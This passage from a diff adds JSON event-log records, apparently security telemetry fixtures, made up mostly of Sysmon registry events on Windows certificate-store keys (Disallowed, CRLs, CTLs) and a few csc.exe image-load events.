"timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570858710000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570859180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570859340000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 